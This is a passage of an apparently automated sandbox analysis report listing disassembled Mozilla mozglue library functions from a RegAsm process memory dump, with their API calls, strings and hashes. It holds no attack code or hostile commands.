                                                                                    • Instruction Fuzzy Hash: 02119E746052409BDF00EF59CE08E5AB779EB8B32AF12C23BED05C2641D730A405CE5A
                                                                                    Function 6C70F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F559
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F561
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F577
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F585
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F5A3
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6C70F3A8
                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C70F56A
                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6C70F499
                                                                                    • [I %d/%d] profiler_resume, xrefs: 6C70F239
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                    • API String ID: 2848912005-2840072211
                                                                                    • Opcode ID: 32a8e3ff55dc0050bc8f149208ffa905a86d179065312b8cf0f8271c55143490
                                                                                    • Instruction ID: ff964b0911c6f712410a45797399546adb3dc1332981b1bc46f3eeb310dda416
                                                                                    • Opcode Fuzzy Hash: 32a8e3ff55dc0050bc8f149208ffa905a86d179065312b8cf0f8271c55143490
                                                                                    • Instruction Fuzzy Hash: 30F030B57006149BDB007B69994CA6E77BDEB8626DF008037FA1583701DB756C058765
                                                                                    Function 6C6D0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,6C6D0DF8), ref: 6C6D0E82
                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C6D0EA1
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D0EB5
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D0EC5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                    • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                    • API String ID: 391052410-1680159014
                                                                                    • Opcode ID: 4b6a67caf3c488f77c577330dd242b2d28505400febf5a2a903e7bdf9f8714c4
                                                                                    • Instruction ID: 2632d79d42b67e6b6b8fd297d90d043a31b4559abb71c94ce1f7aaffb2e3fd05
                                                                                    • Opcode Fuzzy Hash: 4b6a67caf3c488f77c577330dd242b2d28505400febf5a2a903e7bdf9f8714c4
                                                                                    • Instruction Fuzzy Hash: E2014B747003928BDF02AFF8C914A4A77B6E74731DF92A936D91182F40D738B8068A59
                                                                                    Function 6C70F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F619
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C70F598), ref: 6C70F621
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F637
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8,?,?,00000000,?,6C70F598), ref: 6C70F645
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8,?,?,00000000,?,6C70F598), ref: 6C70F663
                                                                                    Strings
                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C70F62A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                    • API String ID: 2848912005-753366533
                                                                                    • Opcode ID: 302c29f5faa00632aba0b63eeef9ee6f7ad52a0e26c1bd47cf8ac70812a1a67f
                                                                                    • Instruction ID: bfc2bd8e846ed1d1c88fe90c7e9b918122eca3a7422b40e53c5a3cf1a55b4b9b
                                                                                    • Opcode Fuzzy Hash: 302c29f5faa00632aba0b63eeef9ee6f7ad52a0e26c1bd47cf8ac70812a1a67f
                                                                                    • Instruction Fuzzy Hash: 42F03AB5300614ABDB007B69994CAAA7BBDEB862ADF008037FA1583741DB756C058B65
                                                                                    Function 6C7005F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C6FCFAE,?,?,?,6C6C31A7), ref: 6C7005FB
                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C6FCFAE,?,?,?,6C6C31A7), ref: 6C700616
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6C31A7), ref: 6C70061C
                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6C31A7), ref: 6C700627
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _writestrlen
                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                    • API String ID: 2723441310-2186867486
                                                                                    • Opcode ID: 30b4c8d3fd668e506913d3aa1328c9dc6782377afa7848099f155f992cee42fd
                                                                                    • Instruction ID: 5d370513ba67af6800082f8ff187fd5d21147be970b3bc2cc3b57aaa380c0437
                                                                                    • Opcode Fuzzy Hash: 30b4c8d3fd668e506913d3aa1328c9dc6782377afa7848099f155f992cee42fd
                                                                                    • Instruction Fuzzy Hash: 38E08CE2A0202037F6142256AC8ADBB761CDBC6139F08013AFD0D86302E94BBD1A51F7
                                                                                    Function 6C6D05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 34eba450723d388768bab4ef1493ac81b088e0fa3dec7fd2711af696a4434721
                                                                                    • Instruction ID: d78adcdda1ea42caa084005b4d53e5aa0827a2263a227ae6c642a1a1a0600cb0
                                                                                    • Opcode Fuzzy Hash: 34eba450723d388768bab4ef1493ac81b088e0fa3dec7fd2711af696a4434721
                                                                                    • Instruction Fuzzy Hash: 6EA14A70A01645CFDB24CF29C994A9AFBF1BF49304F45866ED44A9BB01E730B985CF94
                                                                                    Function 6C7071A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C706060: moz_xmalloc.MOZGLUE(00000024,3DC044E3,00000000,?,00000000,?,?,6C705FCB,6C7079A3), ref: 6C706078
                                                                                    • free.MOZGLUE(-00000001), ref: 6C7072F6
                                                                                    • free.MOZGLUE(?), ref: 6C707311
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$moz_xmalloc
                                                                                    • String ID: 333s$333s$Copied unique strings$Spliced unique strings
                                                                                    • API String ID: 3009372454-760240034
                                                                                    • Opcode ID: ab35fe6a8d9ac341ecf609ff1e8aa1a14d016b5179672e37db774346f8563ec6
                                                                                    • Instruction ID: 34ce3cb3b88d20054726caf1fa7322667786de72130e1735604b8c6a0a6423a6
                                                                                    • Opcode Fuzzy Hash: ab35fe6a8d9ac341ecf609ff1e8aa1a14d016b5179672e37db774346f8563ec6
                                                                                    • Instruction Fuzzy Hash: E27192B1F002198FDB18CF69C99469DB7F2AF84314F25C12DD81AAB751DB31A946CBC0
                                                                                    Function 6C7214A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7214C5
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7214E2
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C721546
                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C7215BA
                                                                                    • free.MOZGLUE(?), ref: 6C7216B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                    • String ID:
                                                                                    • API String ID: 1909280232-0
                                                                                    • Opcode ID: 382286ed8b623c1fd338d04b643c15e052f03742c9b533e16c321ee2b6122047
                                                                                    • Instruction ID: 9d5b589af648430d529ad2be0811ca0d67a2a89831fd2e71107e1869fbb74a75
                                                                                    • Opcode Fuzzy Hash: 382286ed8b623c1fd338d04b643c15e052f03742c9b533e16c321ee2b6122047
                                                                                    • Instruction Fuzzy Hash: 29611072A007048BDB21DF25C984BDEB7B5BF8A308F44852DED8A57701EB35E949CB91
                                                                                    Function 6C71C160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C71C1F1
                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C71C293
                                                                                    • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C71C29E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: fgetc$memcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1522623862-0
                                                                                    • Opcode ID: 50b7eeb02317adf080bc53babb2f96b7308342cc59d78f87de151153d957ad25
                                                                                    • Instruction ID: e571274a61cee35d01144719e99c339cd4e60cf6f80065be0cb853465798d60f
                                                                                    • Opcode Fuzzy Hash: 50b7eeb02317adf080bc53babb2f96b7308342cc59d78f87de151153d957ad25
                                                                                    • Instruction Fuzzy Hash: 6461CF71A04214CFCB14DFE8D98459EBBB5FF49325F19453AE802A7A51C731A944CFA1
                                                                                    Function 6C719F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C719FDB
                                                                                    • free.MOZGLUE(?,?), ref: 6C719FF0
                                                                                    • free.MOZGLUE(?,?), ref: 6C71A006
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C71A0BE
                                                                                    • free.MOZGLUE(?,?), ref: 6C71A0D5
                                                                                    • free.MOZGLUE(?,?), ref: 6C71A0EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                    • String ID:
                                                                                    • API String ID: 956590011-0
                                                                                    • Opcode ID: 1e55570d646b260a8df4b7d1b196c00299681113459486ee97a984e795877988
                                                                                    • Instruction ID: 7c7d297e32c497ed3262a823b76892885e4050b548295ee6306bfeded365d1b7
                                                                                    • Opcode Fuzzy Hash: 1e55570d646b260a8df4b7d1b196c00299681113459486ee97a984e795877988
                                                                                    • Instruction Fuzzy Hash: F761A07550D7019FC711CF18C58056AB3F5FF89328F54866AE8999BB02E731E98ACBC1
                                                                                    Function 6C71DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71DC60
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C71D38A,?), ref: 6C71DC6F
                                                                                    • free.MOZGLUE(?,?,?,?,?,6C71D38A,?), ref: 6C71DCC1
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C71D38A,?), ref: 6C71DCE9
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C71D38A,?), ref: 6C71DD05
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C71D38A,?), ref: 6C71DD4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 1842996449-0
                                                                                    • Opcode ID: afb1747803c81c93f1f7a0227fba11e772c149912b6cee3de528d0bdf0ae119f
                                                                                    • Instruction ID: 85cb001ab6afa9c35dc7f189c595e09d045efcbae93d34f538f288befe264d39
                                                                                    • Opcode Fuzzy Hash: afb1747803c81c93f1f7a0227fba11e772c149912b6cee3de528d0bdf0ae119f
                                                                                    • Instruction Fuzzy Hash: EB4198B5A04605CFCB00CFA9C98499ABBF6FF89318B19446AD945ABB10DB31FC00CF94
                                                                                    Function 6C6C39A0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E744,ewrl,00000000,ewrl,?,6C6E6112), ref: 6C6C39AF
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E744,?,6C6E6112), ref: 6C6C3A34
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784,6C6E6112), ref: 6C6C3A4B
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6C3A5F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                    • String ID: \tl$ewrl
                                                                                    • API String ID: 3168844106-1392482807
                                                                                    • Opcode ID: 426341bc805f3df2143781614fbf5529f53694c61a5508c9f43819bfd6b3bda8
                                                                                    • Instruction ID: 0de67b7fe515828907f031e3611cac3b128ef1ed32ad302197a071d164b2c5a6
                                                                                    • Opcode Fuzzy Hash: 426341bc805f3df2143781614fbf5529f53694c61a5508c9f43819bfd6b3bda8
                                                                                    • Instruction Fuzzy Hash: 1D213532301B058FC725EF7AC445A6AB3B5EB86738B24863AC46587F40E730A805C79A
                                                                                    Function 6C71C810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C71C82D
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C71C842
                                                                                      • Part of subcall function 6C71CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C73B5EB,00000000), ref: 6C71CB12
                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C71C863
                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C71C875
                                                                                      • Part of subcall function 6C6FB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C73B636,?), ref: 6C6FB143
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C71C89A
                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71C8BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 2745304114-0
                                                                                    • Opcode ID: 7c90fa446d0618b9c74b821e19b85933382c54fb927dc67f4f67c127af7ae26b
                                                                                    • Instruction ID: 5b8372451bae9ca6d9e1e4e5f4d95a2d097305372c71c57d29e08368d1326f01
                                                                                    • Opcode Fuzzy Hash: 7c90fa446d0618b9c74b821e19b85933382c54fb927dc67f4f67c127af7ae26b
                                                                                    • Instruction Fuzzy Hash: B4118171B002099BCB00EFA5C9C98AEBBB5AF89359B04417AE61697741EB30AD05CB91
                                                                                    Function 6C70E100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70E12F
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C70E084,00000000), ref: 6C70E137
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C70E196
                                                                                    • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C70E1E9
                                                                                      • Part of subcall function 6C7099A0: GetCurrentThreadId.KERNEL32 ref: 6C7099C1
                                                                                      • Part of subcall function 6C7099A0: AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C7099CE
                                                                                      • Part of subcall function 6C7099A0: ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C7099F8
                                                                                    Strings
                                                                                    • [I %d/%d] WriteProfileToJSONWriter, xrefs: 6C70E13F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
